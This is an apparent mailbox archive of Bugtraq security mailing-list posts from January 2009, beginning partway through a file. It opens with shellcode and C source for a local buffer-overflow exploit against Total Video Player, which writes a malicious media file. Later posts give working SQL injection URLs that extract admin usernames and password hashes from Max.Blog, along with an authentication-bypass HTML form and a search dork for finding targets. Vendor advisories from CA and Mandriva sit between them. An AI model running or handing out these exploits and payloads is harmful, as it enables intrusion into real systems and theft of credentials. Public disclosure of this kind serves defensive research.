"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";




int main(int argc,char *argv[]){
    FILE *openfile;
    unsigned char *buffer;
    unsigned int offset=0;
    unsigned int RET=0x7c85d568;
    int number=0;
                 printf("*********************************************************\n");
                 printf("Total Video Player local universal buffer overflow exploit\n");
                 printf("Cded by SimO-s0fT(simo@exploiter-ma.com)");
                 printf("greetz : to Allah \n");
                 printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
                 printf("***********************************************************\n"); 
    scanf("%d",&number);
    if((openfile=fopen(argv[1],"wb"))==NULL){
                                            perror("connot opening .....!!\n");
                                            exit(0);
                                            }
    switch(number){
                   case 1:                  buffer =  (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET));
                                            memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET));
                                            offset=OFFSET;
                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
                                            offset+=sizeof(RET);
                                            memcpy(buffer+offset,scode1,strlen(scode1));
                                            offset+=strlen(scode1);
                                            fputs(twacha,openfile);
                                            fputs(buffer,openfile);
                                            fclose(openfile);
                                            printf("File created ....!\n"
                                                         "open it with tvp\n");
                                            break;
                                            
                   case 2:                  buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET));
                                            memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET));
                                            offset = OFFSET;
                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
                                            offset+=sizeof(RET);
                                            memcpy(buffer+offset,scode2,strlen(scode2));
                                            offset=strlen(scode2);
                                            fputs(twacha,openfile);
                                            fputs(buffer,openfile);
                                            fclose(openfile);
                                            printf("File created ....!\n"
                                                         "open it with tvp\n");
                                            break;
                   }
                   
    free(buffer);
    return 0;
}

    
        
    

From - Tue Jan 27 12:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d20
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39309-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1D26EED834
for <lists@securityspace.com>; Tue, 27 Jan 2009 12:07:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6CEAD237849; Tue, 27 Jan 2009 08:22:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1694 invoked from network); 27 Jan 2009 14:42:22 -0000
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Date: Tue, 27 Jan 2009 10:08:01 -0500
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204063DC155@USILMS12.ca.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Thread-Index: AcmAkQuYBFPmiNzbT7C0ZFM9hKvbrA=From: "Williams, James K" <James.Williams@ca.com>
To: <bugtraq@securityfocus.com>
X-OriginalArrivalTime: 27 Jan 2009 15:08:31.0721 (UTC) FILETIME=[1DE94590:01C98091]
Status:   

Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion 
Multiple Vulnerabilities


CA Advisory Reference: CA20090126-01


CA Advisory Date: 2009-01-26


Reported By:
Thierry Zoller and Sergio Alvarez of n.runs AG


Impact: A remote attacker can evade detection.


Summary: The CA Anti-Virus engine contains multiple 
vulnerabilities that can allow a remote attacker to evade 
detection by the Anti-Virus engine by creating a malformed archive 
file in one of several common file archive formats. CA has 
released a new Anti-Virus engine to address the vulnerabilities. 
The vulnerabilities, CVE-2009-0042, are due to improper handling 
of malformed archive files by the Anti-Virus engine. A remote 
attacker can create a malformed archive file that potentially 
contains malware and evade anti-virus detection.

Note: After files have been extracted from an archive, the desktop 
Anti-Virus engine is able to scan all files for malware. 
Consequently, detection evasion can be a concern for gateway 
anti-virus software if archives are not scanned, but the risk is 
effectively mitigated by the desktop anti-virus engine.


Mitigating Factors: See note above.


Severity: CA has given these vulnerabilities a Low risk rating.


Affected Products:
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, 
   r8, r8.1
CA Anti-Virus 2007 (v8), 2008
eTrust EZ Antivirus r7, r6.1
CA Internet Security Suite 2007 (v3), 2008
CA Internet Security Suite Plus 2008
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) r8, 8.1
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
CA Protection Suites r2, r3, r3.1
CA Secure Content Manager (formerly eTrust Secure Content 
   Manager) 8.0, 8.1
CA Anti-Spyware for the Enterprise (Formerly eTrust 
   PestPatrol) r8, 8.1
CA Anti-Spyware 2007, 2008
CA Network and Systems Management (NSM) (formerly Unicenter 
   Network and Systems Management) r3.0, r3.1, r11, r11.1
CA ARCserve Backup r11.1, r11.5, r12 on Windows
CA ARCserve Backup r11.1, r11.5 Linux
CA ARCserve client agent for Windows
CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0
CA Common Services (CCS) r11, r11.1
CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)


Non-Affected Products:
CA Anti-Virus engine with arclib version 7.3.0.15 installed


Affected Platforms:
Windows
UNIX
Linux
Solaris
Mac OS X
NetWare


Status and Recommendation:
CA released arclib 7.3.0.15 in September 2008.  If your product is 
configured for automatic updates, you should already be protected, 
and you need to take no action.  If your product is not configured 
for automatic updates, then you simply need to run the update 
utility included with your product.


How to determine if you are affected:

For products on Windows:

1. Using Windows Explorer, locate the file "arclib.dll". By 
   default, the file is located in the 
   "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is earlier than indicated below, the 
   installation is vulnerable.

File Name    File Version
arclib.dll   7.3.0.15

*For eTrust Intrusion Detection 2.0 the file is located in 
"Program Files\eTrust\Intrusion Detection\Common", and for eTrust 
Intrusion Detection 3.0 and 3.0 sp1, the file is located in 
"Program Files\CA\Intrusion Detection\Common".

For CA Anti-Virus r8.1 on non-Windows platforms:

Use the compver utility provided on the CD to determine the 
version of Arclib. If the version is less than 7.3.0.15, the 
installation is vulnerable. 

Example compver utility output:
     ------------------------------------------------
     COMPONENT NAME                           VERSION
     ------------------------------------------------
     eTrust Antivirus Arclib Archive Library  7.3.0.15
     ... (followed by other components)

For reference, the following are file names for arclib on 
non-Windows operating systems:

Operating System    File name
Solaris             libarclib.so
Linux               libarclib.so
Mac OS X            arclib.bundle


Workaround: 
Do not open email attachments or download files from untrusted 
sources.


References (URLs may wrap):
CA Support:
http://support.ca.com/
CA20090126-01: Security Notice for CA Anti-Virus Engine
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1976
01
Solution Document Reference APARs:
n/a
CA Security Response Blog posting:
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple 
Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx
Reported By: 
Thierry Zoller and Sergio Alvarez of n.runs AG
http://www.nruns.com/
http://secdev.zoller.lu
CVE References:
CVE-2009-0042 - Anti-Virus detection evasion
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your 
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777
82


Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.

From - Tue Jan 27 12:18:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d21
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39310-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9518CED883
for <lists@securityspace.com>; Tue, 27 Jan 2009 12:16:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C5433237840; Tue, 27 Jan 2009 08:22:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3037 invoked from network); 27 Jan 2009 15:01:04 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type:content-transfer-encoding;
        bh=PN6d8SHFtxKbMYNtFwi5F05B6grwDSkPblhLuJ7G7cw=;
        b=x/0rwi/BjE9ypFEgb2MCSKAmhnU7cedIs8B+A8JF/vRYo1ms311CDgNzrD/gpKcDz2
         AxbnqyVXc4x3U35Sdj04y8yO69BMeLKCcq1OhzhEZezliltwgDebrv88qLTne7l6wWen
         v62qyrkTCP68ZCAIY9BRB0kvw0744CDUG5oAYDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type
         :content-transfer-encoding;
        b=KnJWa2CbUVJjV5KgIMWSxTFq0NJ+EujPG/E276zDHpsO+v+e+dfPlnCC9HM1eDYF+A
         zhdT509awm1yoyba2qxd8G8p9ea04p+gUEvYND7DVzN2EigVOm2oNHSq9eXif7eZmgwc
         yOJNqUX1xCqQZK8AZrgZtUUg1/vgLkf5Q20BEMIME-Version: 1.0
Date: Tue, 27 Jan 2009 16:27:06 +0100
Message-ID: <48317b000901270727s6c0889aev3090ab24fb534984@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

############################################################################

- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)

http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################


-- 
Salvatore "drosophila" Fresta
CWNP444351

From - Tue Jan 27 14:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d22
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39311-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 938D8ED8A6
for <lists@securityspace.com>; Tue, 27 Jan 2009 14:01:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E2C19143773; Tue, 27 Jan 2009 11:51:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5954 invoked from network); 27 Jan 2009 15:38:10 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=V9pN_vKMTjsYsVUAaSgA:9 a=1KzNd32ZXwaiil2vAlIA:7 a=iNj5OGtY_VId37t__GrlwVuDUTMA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:030 ] amarok
Date: Tue, 27 Jan 2009 09:11:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LRqWi-0001fz-Ty@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:030
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : amarok
 Date    : January 26, 2009
 Affected: 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Data length values in metadata Audible Audio media file (.aa) can lead
 to an integer overflow enabling remote attackers use it to trigger an
 heap overflow and enabling the possibility to execute arbitrary code
 (CVE-2009-0135).
 
 Failure on checking heap allocation on Audible Audio media files
 (.aa) allows remote attackers either to cause denial of service or
 execute arbitrary code via a crafted media file (CVE-2009-0136).
 
 This update provide the fix for these security issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 1a8246a202bcc785f761a97978599a58  2008.1/i586/amarok-1.4.8-12.2mdv2008.1.i586.rpm
 1783e7430e515d4a6144647c50ae8def  2008.1/i586/amarok-engine-void-1.4.8-12.2mdv2008.1.i586.rpm
 7ea34714db78c48ba57efba24259b1e8  2008.1/i586/amarok-engine-xine-1.4.8-12.2mdv2008.1.i586.rpm
 9741e2d710a7f0138b17d8ae5253db3b  2008.1/i586/amarok-engine-yauap-1.4.8-12.2mdv2008.1.i586.rpm
 07e042b5b18e4d3c7e030d8fcf796b07  2008.1/i586/amarok-scripts-1.4.8-12.2mdv2008.1.i586.rpm
 260e9de9cecd888ff2f2d27f2ded127f  2008.1/i586/libamarok0-1.4.8-12.2mdv2008.1.i586.rpm
 2267841689410ebf301431611c626da1  2008.1/i586/libamarok0-scripts-1.4.8-12.2mdv2008.1.i586.rpm
 301b052ea6661df51e95cb0e7d616961  2008.1/i586/libamarok-devel-1.4.8-12.2mdv2008.1.i586.rpm
 815a7454f91161542127005d1b4d5143  2008.1/i586/libamarok-scripts-devel-1.4.8-12.2mdv2008.1.i586.rpm 
 e06458ad6529e0be044c136797bfa1c8  2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 ffdd3bd41a777732d4e62f816c109df8  2008.1/x86_64/amarok-1.4.8-12.2mdv2008.1.x86_64.rpm
 ec10186c7ede7a88e5b17556cdd2dfb0  2008.1/x86_64/amarok-engine-void-1.4.8-12.2mdv2008.1.x86_64.rpm
 43afd708057335d8240d8089dac7b407  2008.1/x86_64/amarok-engine-xine-1.4.8-12.2mdv2008.1.x86_64.rpm
 3495536bfa3eb6316bc9f4b3bf0e21d0  2008.1/x86_64/amarok-engine-yauap-1.4.8-12.2mdv2008.1.x86_64.rpm
 f686b429164bcf5568c354fe04069aca  2008.1/x86_64/amarok-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm
 37c16f39f142bbe43f77ebd8662a1241  2008.1/x86_64/lib64amarok0-1.4.8-12.2mdv2008.1.x86_64.rpm
 7d655865abe84d513fc6b661f06ca8ef  2008.1/x86_64/lib64amarok0-scripts-1.4.8-12.2mdv2008.1.x86_64.rpm
 e2e6f738de6f3d4adec513b3fc6fd46d  2008.1/x86_64/lib64amarok-devel-1.4.8-12.2mdv2008.1.x86_64.rpm
 21a51b57b01ea6e9b2623c8f7b73a20e  2008.1/x86_64/lib64amarok-scripts-devel-1.4.8-12.2mdv2008.1.x86_64.rpm 
 e06458ad6529e0be044c136797bfa1c8  2008.1/SRPMS/amarok-1.4.8-12.2mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 dfa1b151504f4f1d300b1c20d2759569  2009.0/i586/amarok-2.0-1.2mdv2009.0.i586.rpm
 074f96428803ec95886965de2430b1d7  2009.0/i586/amarok-scripts-2.0-1.2mdv2009.0.i586.rpm
 7bc361ce058e5e28f76fffca7b45e804  2009.0/i586/libamarok-devel-2.0-1.2mdv2009.0.i586.rpm
 4f3f0f5b6fe7b82722056c60e145e55e  2009.0/i586/libamaroklib1-2.0-1.2mdv2009.0.i586.rpm
 98975dd8bd348c8b497c706550559798  2009.0/i586/libamarokplasma2-2.0-1.2mdv2009.0.i586.rpm
 3f411fc8f8a2d5040071e3c5c17e0750  2009.0/i586/libamarokpud1-2.0-1.2mdv2009.0.i586.rpm
 00449f621b74a45337c6edf067155639  2009.0/i586/libamarok_taglib1-2.0-1.2mdv2009.0.i586.rpm 
 250b512463a015324ae1f7bce6a4381f  2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 9d3041f66c3c88492c9b217625a3d8b9  2009.0/x86_64/amarok-2.0-1.2mdv2009.0.x86_64.rpm
 6336ad0873c72428133dc72499edb386  2009.0/x86_64/amarok-scripts-2.0-1.2mdv2009.0.x86_64.rpm
 e2af1726c929428a61cef94c28561f69  2009.0/x86_64/lib64amarok-devel-2.0-1.2mdv2009.0.x86_64.rpm
 ecdafc395867d7c62e02015faa000d15  2009.0/x86_64/lib64amaroklib1-2.0-1.2mdv2009.0.x86_64.rpm
 c682cd1bd6b557184fe81f1aa2fb2953  2009.0/x86_64/lib64amarokplasma2-2.0-1.2mdv2009.0.x86_64.rpm
 76af360ed85f551f6aa8e204ef2f2f43  2009.0/x86_64/lib64amarokpud1-2.0-1.2mdv2009.0.x86_64.rpm
 abaf80b0b0d0e7bd5ca32ba7413671aa  2009.0/x86_64/lib64amarok_taglib1-2.0-1.2mdv2009.0.x86_64.rpm 
 250b512463a015324ae1f7bce6a4381f  2009.0/SRPMS/amarok-2.0-1.2mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJfwXHmqjQ0CJFipgRAq8+AJwMdbJCzad1KwNPcu+/ED1ry9VaMQCfd2WN
gnrxNsGlZ3cgoABesY1q0DE=8/6v
-----END PGP SIGNATURE-----

From - Tue Jan 27 16:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d23
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39312-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0E943ED73B
for <lists@securityspace.com>; Tue, 27 Jan 2009 16:00:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 15E4F236FC2; Tue, 27 Jan 2009 13:42:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19688 invoked from network); 27 Jan 2009 20:21:49 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type:content-transfer-encoding;
        bh=gy8HHH93WrT08Kfm8Vq8IngvvKo2t14MMILdX7Soe/Q=;
        b=fUOI8ZeCjpznuctZ+5+ZLdnSdKaP99UzqBw/tm42jQc5loanS9mz8ir4rXVC3N3yih
         NvqIqB7HQ9IU/jbATLoMql/evzkwcBobRRx7Xar2kv+15yqv7Nz7/CCUXqc23GVGTSj0
         hC0SAyu6Jy3iuJ9tx4lnh/2KTdFml4/9eJBFUDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type
         :content-transfer-encoding;
        b=JIf7Gbm5XrLCBri6G/IjfSmEL5DSfbUUMkPTSMA6eR7qm0l9pfgzAlFFebAofR8vEH
         o6F/4Hv/HQWNkAwk6ESqnD8awGs1vqQIXC6nfV3bYUx7/ZcH+z1h+xOVRk9p4x29STUf
         BOSJ+A7kDXkQjLPwzvxuKPQ38iLfAljSqlIPkMIME-Version: 1.0
Date: Tue, 27 Jan 2009 21:47:56 +0100
Message-ID: <48317b000901271247j3cf9ae7kb4dff59f84beffe4@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

############################################################################

- BUGS

SQL Injection:

Requisites: magic quotes = off

File affected: submit_post.php

This bug allows a registered user to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)

http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

From - Wed Jan 28 11:08:38 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d39
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39313-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id F3B39ED87D
for <lists@securityspace.com>; Wed, 28 Jan 2009 11:02:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C3837236FDB; Wed, 28 Jan 2009 08:44:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20941 invoked from network); 27 Jan 2009 20:47:49 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type:content-transfer-encoding;
        bh=7qPH1xidG1reCEbjhllsscVA5PWeFp6FYkpj8NAJUDk=;
        b=EgxwJ42C5oaXMg+S5Bl9t1BcmHreX5pvOyLn2np0FO6RWadXzYuqvDxZdmJwaHgUu6
         mqMPbfbHRGLEmXX1cM60Xvs/qdoCzSuFv5A1aT5wRfSJDBn8wMkghoS6CvpzuBmZ094j
         krPDEUeqYufde2EZ0kkrHZjMmJMjp2vljYOPgDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type
         :content-transfer-encoding;
        b=EsqZIzOY27LPzbn4UazHrk07EqJZE13IZPNsHh2iWn3aBGD9LoQYQuPD2w5zfdMx32
         t++apR1Z6bwqqkQm3Lm2oQZaZa96u8OmiAJ8ahrS+37rCVb0o19ZYKeVb9ln3UyYyQzz
         F8f1z5qmdHdhzDqRXUggntpaFVTsPCp3QzV/oMIME-Version: 1.0
Date: Tue, 27 Jan 2009 22:13:59 +0100
Message-ID: <48317b000901271313r3092f7b0pa540daece999172d@mail.gmail.com>
Subject: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Status:   

################### Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug:          * Offline Authentication Bypass
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date:          27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author:        Salvatore "drosophila" Fresta
        e-mail: drosophilaxxx@gmail.com
              

############################################################################

- BUGS

Offline Authentication Bypass Exploit:

Requisites: magic quotes = off

File affected: offline_auth.php

This bug allows a guest to bypass an offline authentication service
using SQL Injection vulnerability.

############################################################################

- CODE

<html>
<head>
<title>
Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
</title>
</head>
<body>
<form action="http://www.site.com/path/offline_auth.php" method="POST">
<input type="text" name="username" value="admin'#" size="15">
<input type="hidden" name="password">
<input type="submit" value="Go!">
</form>
</body>
</html>

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351

From - Wed Jan 28 11:18:39 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005d3a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39314-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 91A42ED788
